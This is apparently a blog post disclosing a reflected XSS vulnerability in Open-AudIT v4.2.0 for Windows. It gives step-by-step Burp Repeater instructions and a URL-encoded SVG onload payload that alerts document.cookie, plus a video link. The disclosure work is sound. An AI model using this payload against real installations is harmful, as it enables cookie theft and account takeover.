Header Ads

Reflected XSS

August 27, 2021 0

 Reflected XSS

 

Product : Open-AudIT v4.2.0 for Windows

 

POC:

 

Open http://localhost/open-audit/index.php/logon

 

login using  admin/password

open list users

http://localhost/open-audit/index.php/users

edit any user and capture the request in proxy



Send to Repeater tab in burp

Now Log Out

Login using normal user

Now go to repeater tab where we capture above request

send request again

we get error



 

Now change parameter data

add Xss payload

data=%7B%22data%22%3A%7B%22id%22%3A%226%22%2C%22type%22%3A%22userssagar<svg%20onload=alert(document.cookie)>%22%2C%22attributes%22%3A%7B%22lang%22%3A%22en%22%7D%7D%7D

After submitting the request we execute Xss

 



Video POC

https://youtu.be/dejNbStg4aY youtube

Tags:

No comments

Subscribe to: Post Comments ( Atom )

Recent post

Reflected XSS

 Reflected XSS   Product : Open-AudIT v4.2.0 for Windows   POC:   Open http://localhost/open-audit/index.php/logon   login ...

Powered by Blogger.